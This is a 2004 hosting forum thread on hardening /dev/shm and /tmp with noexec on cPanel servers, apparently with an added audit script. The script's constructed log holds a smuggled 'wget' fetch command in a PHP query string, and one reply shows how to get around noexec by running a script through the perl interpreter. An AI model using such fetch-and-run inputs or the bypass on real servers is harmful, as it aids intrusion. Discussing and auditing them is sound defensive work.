
Exploit in /dev/shm

Discussion in 'General Discussion' started by HostDime, Feb 16, 2004.

  1. HostDime

    HostDime Well-Known Member
    PartnerNOC

    Joined:
    Mar 15, 2003
    Messages:
    81
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    Orlando, Florida
    New Exploit In Cpanel - Read Asap! - Servers Hackable

    I am the first to post about this new form of getting into a box. Just to think, if you have a RedHat box with a default file system like DedicatedNow, then your box is as good as toasted. Your box can have /tmp noexec,nosuid,nodev,nouser! You're still gone.

    /dev/shm.

    Shared Memory. Unfortunately, by default it has 'defaults' settings, which allow files to be run. To fix this, type:

    pico /etc/fstab

    In the /dev/shm line, change 'defaults' to 'noexec,nosuid' without the quotes. Hit CTRL + X, and y to save as /etc/fstab, and enter. Now, umount /dev/shm. Then mount /dev/shm. Your shm is now secure. Unfortunately, many php scripts are poorly written and are insecure. Check all domlogs for wget, possibly with this command:

    for files in /usr/local/apache/domlogs/*; do grep -H "wget" "$files"; done

    This will check for wget in any files (-H prints the log name in front of each hit), and help identify which insecure files lead to what. I also suggest a process killer such as WatchDog from http://www.webhosting-tools.com. Lane Vance owns the site and is a very good programmer. Watchdog is a CGI script that runs in the background and can also kill files run by nobody for an amount of time or CPU you choose. This will help kill perl scripts executed by /usr/bin/perl in /tmp or /dev/shm. Many perl scripts are out now that run DDOS's and shells. I also suggest downloading APF firewall, and installing it. If you need a good default cpanel conf file, email me at kris@hostdime.com. I can help you install it, secure your server. Unfortunately Cpanel will never be secure, and you need a security admin these days to make sure your servers are as secure as they can be, and up2date :banana:


    Comments are welcome to this find.
     
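As an added example (not from the original post, and not cPanel's own tooling), a POSIX shell script that performs the two checks the post above describes: whether /dev/shm and /tmp carry noexec, nosuid and nodev, and which web script a "wget" request in a domlog actually hit. It assumes constructed mounts and domlog data written to a temp directory in place of the live /proc/mounts and /usr/local/apache/domlogs so it runs offline.

```shell
#!/bin/sh
# Added example (not from the original post): audit mount options of /dev/shm
# and /tmp, then find which script a "wget" request hit. Constructed data
# stands in for /proc/mounts and /usr/local/apache/domlogs so it runs offline.
WORK=$(mktemp -d); trap 'rm -rf "$WORK"' EXIT
# Constructed mounts listing: /tmp is hardened, /dev/shm still has defaults.
cat > "$WORK/mounts" <<'EOF'
/dev/sda1 / ext3 rw,relatime 0 0
tmpfs /dev/shm tmpfs rw,relatime 0 0
/dev/sda2 /tmp ext3 rw,nosuid,nodev,noexec,relatime 0 0
EOF
# Constructed domlog (combined format); only line 2 passes a wget command
# to a PHP script through its query string. Line 3 is a plain Wget crawl.
cat > "$WORK/domlog" <<'EOF'
203.0.113.5 - - [16/Feb/2004:10:01:22 -0500] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/4.0"
203.0.113.5 - - [16/Feb/2004:10:01:23 -0500] "GET /foo.php?cmd=wget%20http://example.invalid/a HTTP/1.1" 200 120 "-" "Mozilla/4.0"
198.51.100.9 - - [16/Feb/2004:10:02:00 -0500] "GET / HTTP/1.1" 200 4096 "-" "Wget/1.8.2"
EOF
# mount_opts MOUNTPOINT MOUNTSFILE: options field of the matching mount line.
mount_opts() {
    awk -v mp="$1" '$2 == mp { print $4; exit }' "$2"
}

# check_mount OPTIONS: "ok" when noexec, nosuid and nodev are all present,
# otherwise "missing:" followed by the absent ones.
check_mount() {
    missing=""
    for opt in noexec nosuid nodev; do
        case ",$1," in
            *",$opt,"*) ;;
            *) missing="$missing $opt" ;;
        esac
    done
    [ -z "$missing" ] && echo ok || echo "missing:$missing"
}

# suspect_scripts LOGFILE...: print "file: /path" for each request line that
# contains "wget" (User-Agent is not searched, so ordinary Wget crawls are
# skipped); the query string is stripped so the hit names the script itself.
suspect_scripts() {
    awk -F'"' 'tolower($2) ~ /wget/ {
        split($2, r, " "); sub(/\?.*/, "", r[2]); print FILENAME ": " r[2]
    }' "$@"
}

for mp in /dev/shm /tmp; do
    echo "$mp: $(check_mount "$(mount_opts "$mp" "$WORK/mounts")")"
done
suspect_scripts "$WORK/domlog"
```

On a live box, point mount_opts at /proc/mounts and suspect_scripts at /usr/local/apache/domlogs/*; after editing /etc/fstab, `mount -o remount,noexec,nosuid /dev/shm` applies the new options without the umount/mount pair.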
  2. StevenC

    StevenC Well-Known Member

    Joined:
    Jan 1, 2004
    Messages:
    254
    Likes Received:
    0
    Trophy Points:
    16
    Re: New Exploit In Cpanel - Read Asap! - Servers Hackable

    Amen to that, it's crazy the amount of people still running old kernels. Nice post =)
     
  3. jamesbond

    jamesbond Well-Known Member

    Joined:
    Oct 9, 2002
    Messages:
    738
    Likes Received:
    1
    Trophy Points:
    18
    Why is this an exploit in Cpanel though?

    I'm not a security expert by any means, but IMHO, noexec etc, only offers limited protection. It's still very easy to execute programs from a noexec partition.

    The benefit of this 'security measure' will quickly diminish as long as it's so easy to work around it.

    The key is to find a serverwide solution to prevent people from uploading malicious programs in the first place, without affecting the customers on the server.

    I've been playing a bit with mod_security but it's very difficult to come up with rules that are strict enough to be effective without causing (possible) issues for your current customers.
     
  4. chican0

    chican0 Well-Known Member

    Joined:
    Mar 26, 2003
    Messages:
    59
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    Los Angeles
    Thanks for the post. Good information here. Appreciate the link too.
     
  5. alex042

    alex042 Well-Known Member

    Joined:
    Sep 13, 2003
    Messages:
    76
    Likes Received:
    0
    Trophy Points:
    6
    Removing files with 'wget' in them will probably break Fantastico if you have that installed. Fantastico requires 'wget' to function properly. It also requires access to wget, so if you have it installed, you can't even disable 'wget'.
     
  6. Curious Too

    Curious Too Well-Known Member

    Joined:
    Aug 31, 2001
    Messages:
    427
    Likes Received:
    0
    Trophy Points:
    16
    cPanel Access Level:
    Root Administrator
    Re: New Exploit In Cpanel - Read Asap! - Servers Hackable

    How is this strictly a cPanel exploit?
     
  7. dgbaker

    dgbaker Well-Known Member
    PartnerNOC

    Joined:
    Sep 20, 2002
    Messages:
    2,578
    Likes Received:
    3
    Trophy Points:
    38
    Location:
    Toronto, Ontario Canada
    cPanel Access Level:
    DataCenter Provider
    I was thinking that as well. Plus I have never seen any DataCenter or major company use anything but the default for /dev/shm.
     
  8. bhaputi

    bhaputi Registered
    PartnerNOC

    Joined:
    Apr 26, 2002
    Messages:
    3
    Likes Received:
    0
    Trophy Points:
    1
    BurstNET/Nocster noexec/etc. on /dev/shm for a while now....
     
  9. eth00

    eth00 Well-Known Member
    PartnerNOC

    Joined:
    Mar 30, 2003
    Messages:
    723
    Likes Received:
    1
    Trophy Points:
    18
    Location:
    NC
    cPanel Access Level:
    Root Administrator
    I agree, that is all I have ever seen. Wget is bad for many reasons but it's so necessary for some stuff to work.

    I think doing this will lead to more problems than it is worth.
     
  10. formerly_burstdan

    formerly_burstdan Registered

    Joined:
    Jun 18, 2004
    Messages:
    1
    Likes Received:
    0
    Trophy Points:
    1
    Location:
    Scranton
    Unless I am misreading this, he is saying to check the logs for which files were pulled using wget, not disabling wget.
     
  11. eth00

    eth00 Well-Known Member
    PartnerNOC

    Joined:
    Mar 30, 2003
    Messages:
    723
    Likes Received:
    1
    Trophy Points:
    18
    Location:
    NC
    cPanel Access Level:
    Root Administrator
    Did not read the post all the way; yeah, you are right, that is what he is talking about doing :)

    It would be interesting to see if anybody has any trouble once they change it to noexec.
     
  12. netwrkr

    netwrkr Well-Known Member

    Joined:
    Apr 12, 2003
    Messages:
    203
    Likes Received:
    0
    Trophy Points:
    16
    I question the poster's motives. Since posting in this forum as the "SecurityManager" for "Host Dime", I also see a post at HHO with the same name and title of "President" of another company.

    I have yet to see one shred of evidence that this is an actual issue. I caution people reading this post to -not- rush forward and make the changes suggested on your production servers until you have had a chance to test. The poster should have notified the proper authorities, i.e. Linux developers, vendors etc. Only then would the subject matter experts be able to weigh in on the suggested change(s) and the implications -if- this was proven to be a real issue.

    TP
     
  13. dgbaker

    dgbaker Well-Known Member
    PartnerNOC

    Joined:
    Sep 20, 2002
    Messages:
    2,578
    Likes Received:
    3
    Trophy Points:
    38
    Location:
    Toronto, Ontario Canada
    cPanel Access Level:
    DataCenter Provider
    TP -

    Hope you're not referring to me? ;)
     
  14. netwrkr

    netwrkr Well-Known Member

    Joined:
    Apr 12, 2003
    Messages:
    203
    Likes Received:
    0
    Trophy Points:
    16
    I was agreeing with you :)

    TP
     
  15. dgbaker

    dgbaker Well-Known Member
    PartnerNOC

    Joined:
    Sep 20, 2002
    Messages:
    2,578
    Likes Received:
    3
    Trophy Points:
    38
    Location:
    Toronto, Ontario Canada
    cPanel Access Level:
    DataCenter Provider
    Just checking. I find the whole thing very strange; as one had commented about burst/nocster, well, we also have servers with them and they use the default.
     
  16. tvcnet

    tvcnet Well-Known Member
    PartnerNOC

    Joined:
    Aug 15, 2003
    Messages:
    116
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    San Diego
    cPanel Access Level:
    DataCenter Provider
    Try this for fun.

    Put one of those nice hacker perl scripts in your /tmp directory, you know the directory you set to non-execute...

    Then run this in your "secured" directory (the whole command must be quoted, otherwise sh -c only gets the cd and perl runs in your current shell):
    sh -c 'cd /var/tmp; /usr/bin/perl yourscript.pl'

    Interesting?

    -Jim
     
  17. chirpy

    chirpy Well-Known Member

    Joined:
    Jun 15, 2002
    Messages:
    13,475
    Likes Received:
    20
    Trophy Points:
    38
    Location:
    Go on, have a guess
    Yup, that's perfectly normal and should be expected.

    noexec doesn't mean that you cannot run a script in /tmp through an interpreter, all it does is stop you running the script directly.

    You can do the exact same thing with a shell script, php script, etc...
     
  18. netwrkr

    netwrkr Well-Known Member

    Joined:
    Apr 12, 2003
    Messages:
    203
    Likes Received:
    0
    Trophy Points:
    16
    amen to that.
     